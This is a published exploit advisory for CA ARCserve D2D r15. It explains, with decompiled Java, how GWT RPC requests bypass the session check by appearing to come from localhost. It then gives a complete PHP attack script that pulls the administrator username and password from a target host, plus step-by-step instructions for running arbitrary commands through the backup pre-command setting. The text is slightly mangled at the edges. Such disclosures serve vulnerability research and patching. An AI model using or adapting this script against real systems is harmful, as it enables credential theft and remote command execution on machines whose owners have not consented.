# Exploit Title:CA ARCserve D2D r15 GWT RPC Request Auth Bypass / Credentials Disclosure and Commands Execution # Google Dork: / # Date: 25 July 2011 # Author: rgod # Software Link: / # Version: r15.0 # Tested on: Microsoft Windows Server 2003 r2 sp2 # CVE : none Administrator Password -> MY_PASSWORD A remote attacker could then login to the affected application then execute arbitrary commands with Administrator group privileges in the following way: Browse Backup settings; Click Advanced tab; Check "Run a command before backup is started"; Fill the white field with the desired command, ex. cmd /c start calc ; Fill the credentials fields with the gained username and password (you can use the same you had before); Select an existing backup destination in the Protection Settings tab; Browse to the main page and clicking "Backup Now"; Select Incremental Backup and press OK; calc.exe is launched various times. Other attacks are possible. Vulnerable code and explaination: web.xml : ...

homepageServlet

com.ca.arcflash.ui.server.HomepageServiceImpl

homepageServlet

/contents/service/homepage

... the decompiled HomepageServiceImpl.class : ... public TrustHostModel getLocalHost() throws BusinessLogicException, ServiceConnectException, ServiceInternalException { try { TrustedHost trustedhost = getLocalWebServiceClient().getLocalHostAsTrust(); TrustHostModel trusthostmodel = ConvertToModel(trustedhost); return trusthostmodel; } catch(AxisFault axisfault) { axisfault.printStackTrace(); } return null; } ... the decompiled WebServiceClient.class : ... public TrustedHost getLocalHostAsTrust() throws AxisFault { Object aobj[] = invokeWebMethod("getLocalHostAsTrust", new Object[0], new Class[] { //<------------ com/ca/arcflash/webservice/data/TrustedHost }); return (TrustedHost)aobj[0]; } ... a request to the FlashServiceImpl Axis2 Web Service is originated note that the ip address originating the request is 127.0.0.1 now!!! So you are using the GWT RPC endpoint as a proxy for the mentioned web service ... from the decompiled FlashServiceImpl.class: ... public TrustedHost getLocalHostAsTrust() throws AxisFault { checkSession(); <-------------------- try { return CommonService.getInstance().getLocalHostAsTrust(); } catch(Throwable throwable) { logger.error(throwable.getMessage(), throwable); } throw new AxisFault("Unhandled exception in web service", FlashServiceErrorCode.Common_ErrorOccursInService); } ... the checkSession() function is called but now I show you because it is bypassed, again from the decompiled FlashServiceImpl.class: ... private void checkSession() throws AxisFault { if(!enableSessionCheck) return; MessageContext messagecontext = MessageContext.getCurrentMessageContext(); Object obj = messagecontext.getProperty(HTTPConstants.MC_HTTP_SERVLETREQUEST); if(obj != null && (obj instanceof HttpServletRequest)) { HttpServletRequest httpservletrequest = (HttpServletRequest)obj; HttpSession httpsession = httpservletrequest.getSession(true); if(checkLocalHost(httpservletrequest.getRemoteAddr(), true)) //<-------------------------------- return; if(httpsession.getAttribute("com.ca.arcflash.webservice.FlashServiceImpl.UserName") == null && httpsession.getAttribute("com.ca.arcflash.webservice.FlashServiceImpl.UUID") == null) throw new AxisFault("Service session timeout", FlashServiceErrorCode.Common_ServiceSessionTimeout); } } ... the checkLocalHost() function is called, this check means "if the ip address originating the request is localhost then do not check the session but go on". look to checkLocalHost() and to initializeIPList() functions inside FlashServiceImpl.class: ... private boolean checkLocalHost(String s, boolean flag) { logger.debug((new StringBuilder()).append("checkLocalHost begin, host:").append(s).append(", localCall:").append(flag).toString()); if(localhostIPList == null) initializeIPList(); if(s == null || s.length() == 0) return false; s = s.trim(); if(logger.isDebugEnabled()) { logger.debug((new StringBuilder()).append("localhostIPList size:").append(localhostIPList.size()).toString()); String s1; for(Iterator iterator = localhostIPList.iterator(); iterator.hasNext(); logger.debug((new StringBuilder()).append("LocalHost:").append(s1).toString())) s1 = (String)iterator.next(); } boolean flag1 = false; Iterator iterator1 = localhostIPList.iterator(); do { if(!iterator1.hasNext()) break; String s2 = (String)iterator1.next(); if(!s.equalsIgnoreCase(s2)) continue; flag1 = true; break; } while(true); logger.debug((new StringBuilder()).append("checkLocalHost end, isLocal:").append(flag1).toString()); return flag1; } private static synchronized void initializeIPList() { if(localhostIPList != null) return; localhostIPList = new ArrayList(); localhostIPList.add("localhost"); //<------------------------- localhostIPList.add("127.0.0.1"); //<------------------------- try { InetAddress inetaddress = InetAddress.getLocalHost(); String s = inetaddress.getHostAddress(); String s1 = inetaddress.getHostName(); if(s != null && !localhostIPList.contains(s)) localhostIPList.add(s); if(s1 != null && !localhostIPList.contains(s1)) localhostIPList.add(s1); String s2 = inetaddress.getCanonicalHostName(); if(s2 != null) { int i = s2.indexOf('.'); if(i > 0) { localhostIPList.add((new StringBuilder()).append("localhost").append(s2.substring(i)).toString()); localhostIPList.add(s2); } } } catch(Exception exception) { logger.error("InetAddress error:", exception); } try { Enumeration enumeration = NetworkInterface.getNetworkInterfaces(); if(enumeration != null) while(enumeration.hasMoreElements()) { NetworkInterface networkinterface = (NetworkInterface)enumeration.nextElement(); Enumeration enumeration1 = networkinterface.getInetAddresses(); while(enumeration1.hasMoreElements()) { InetAddress inetaddress1 = (InetAddress)enumeration1.nextElement(); String s3 = inetaddress1.getHostAddress(); if(s3 != null && !localhostIPList.contains(s3)) localhostIPList.add(s3); } } } catch(Exception exception1) { logger.error("NetworkInterface error:", exception1); } } ... a match is performed against the localhostIPList array then the web service cannot know which is the real ip address of the remote user but thinks it is 127.0.0.1 ! again, from the decompiled HomepageServiceImpl.class : ... private TrustHostModel ConvertToModel(TrustedHost trustedhost) { TrustHostModel trusthostmodel = new TrustHostModel(); trusthostmodel.setHostName(trustedhost.getName()); trusthostmodel.setPassword(trustedhost.getPassword()); trusthostmodel.setPort(Integer.valueOf(trustedhost.getPort())); trusthostmodel.setType(Integer.valueOf(trustedhost.getType())); trusthostmodel.setUser(trustedhost.getUserName()); trusthostmodel.setUuid(trustedhost.getUuid()); trusthostmodel.setProtocol(trustedhost.getProtocol()); trusthostmodel.setSelected(Boolean.valueOf(false)); return trusthostmodel; } ... this prepares the output, returning the object properties previously used to store the admin credentials. The following code can be used to disclose them, you can perform post-auth commands execution by browsing the target application and act as described. rgod */ error_reporting(E_ALL ^ E_NOTICE); set_time_limit(0); $err[0] = "[!] This script is intended to be launched from the cli!"; $err[1] = "[!] You need the curl extesion loaded!"; if (php_sapi_name() <> "cli") { die($err[0]); } function syntax() { print("usage: php 9sg_ca_d2d.php [ip_address]\r\n" ); die(); } $argv[1] ? print("[*] Attacking...\n") : syntax(); if (!extension_loaded('curl')) { $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; if ($win) { !dl("php_curl.dll") ? die($err[1]) : print("[*] curl loaded\n"); } else { !dl("php_curl.so") ? die($err[1]) : print("[*] curl loaded\n"); } } function _s($url, $is_post, $ck, $request) { global $_use_proxy, $proxy_host, $proxy_port; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); if ($is_post) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $request); } curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, array( "Cookie: donotshowgettingstarted=%7B%22state%22%3Atrue%7D;".$ck , "Content-Type: text/x-gwt-rpc; charset=utf-8;" )); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Jakarta Commons-HttpClient/3.1"); curl_setopt($ch, CURLOPT_TIMEOUT, 0); if ($_use_proxy) { curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port); } $_d = curl_exec($ch); if (curl_errno($ch)) { //die("[!] ".curl_error($ch)."\n"); } else { curl_close($ch); } return $_d; } $host = $argv[1]; $port = 8014; $rpc='5|0|4|http://".$host.":8014/contents/|2C6B33BED38F825C48AE73C093241510|com.ca.arcflash.ui.client.homepage.HomepageService|getLocalHost|1|2|3|4|0|'; $url = "http://$host:$port/contents/service/homepage"; $out = _s($url, 1, "", $rpc); if (strpos($out,"The call failed on the server;") or (!strpos($out,"200 OK"))){ print("[!] Error, maybe patched or admin never logged in. See output...\n"); print($out); } else { $temp=explode("\"user\",\"",$out);$temp=explode("\"",$temp[1]);$usr=trim($temp[0]); print("Username: ".$usr."\n"); $temp=explode("\"password\",\"",$out);$temp=explode("\"",$temp[1]);$pwd=trim($temp[0]); print("Password: ".$pwd."\n"); } ?>

Query Builder